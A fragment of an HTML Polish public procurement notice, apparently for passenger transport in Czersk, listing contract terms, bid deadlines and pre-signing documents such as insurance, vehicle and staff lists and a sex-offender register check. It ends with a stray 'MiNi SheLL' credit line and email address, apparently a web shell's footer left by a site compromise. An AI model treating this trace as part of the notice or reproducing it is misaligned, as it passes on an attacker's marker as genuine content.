unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 24.1.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w przypadkach dopuszczalnych zmian umowy, o których mowa w art. 455 ustawy Pzp oraz zapisach PPU. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/czersk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-15 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 23.4.	Wykonawca, przed podpisaniem umowy, powinien przedłożyć: DOTYCZY: CZ.I, CZ.II, CZ.III, CZ.IV, CZ.V, CZ.VI:<br/>23.4.1.	w przypadku konsorcjum lub spółki cywilnej - umowę regulującą współpracę Wykonawców działających wspólnie (umowa konsorcjum lub umowa spółki cywilnej),<br/>23.4.2.	opłaconą polisę OC (wraz z potwierdzeniem opłaty), a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej związanej z przedmiotem zamówienia.<br/>23.4.3.	opłaconą polisę NNW (wraz z potwierdzeniem opłaty), a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od następstw nieszczęśliwych wypadków.<br/>23.4.4.	oświadczenie o spełnieniu wymogów w zakresie bezpieczeństwa przewozu osób – załącznik nr 11 do SWZ.<br/>23.4.5.	wykaz pojazdów niezbędnych do realizacji zamówienia z podaniem marki i rocznika pojazdu, liczby miejsc siedzących, numerów rejestracyjnych pojazdów, do kiedy pojazd ma aktualne badanie techniczne oraz jaka jest podstawa dysponowania przez Wykonawcę – załącznik nr 12 do SWZ.<br/>23.4.6.	wykaz osób: kierowcy i opiekunowie przewidziani do realizacji zamówienia – załącznik nr 13 do SWZ.<br/>23.4.7.	oświadczenie potwierdzające zdolność wymienionych osób w pkt 23.4.6. do wykonania zamówienia, tj. opiekun i kierowca. Kierowca – prawo jazdy kategoria B, opiekun – ukończone szkolenie w zakresie BHP i stosowne szkolenie w zakresie udzielania pierwszej pomocy<br/>23.4.8.	oświadczenie wykonawcy w zakresie wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO<br/>23.4.9.	Informację z Rejestru Sprawców Przestępstw na Tle Seksualnym. Rejestr Sprawców Przestępstw na Tle Seksualnym składa się z Rejestru publicznego i Rejestru z dostępem ograniczonym. Dostęp do Rejestru publicznego jest nieograniczony. Wystarczy przejść na: &lt;rps.ms.gov.pl&gt;. Zgodnie z art. 21 ust. 1-3 ustawy z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym i ochronie małoletnich (Dz. U. z 2024 r., poz. 560), w przypadku zatrudniania lub dopuszczania osób do innej działalności związanej z wychowaniem, edukacją, wypoczynkiem, leczeniem małoletnich lub opieką nad nimi (np. wyjazdy na ferie zimowe, agroturystyka, obozy jeździeckie) pracodawca lub inny organizator w zakresie takiej działalności ma obowiązek sprawdzenia, czy dane zatrudnianej lub dopuszczanej osoby są zamieszczone w Rejestrze z dostępem ograniczonym.

Creat By MiNi SheLL
Email: jattceo@gmail.com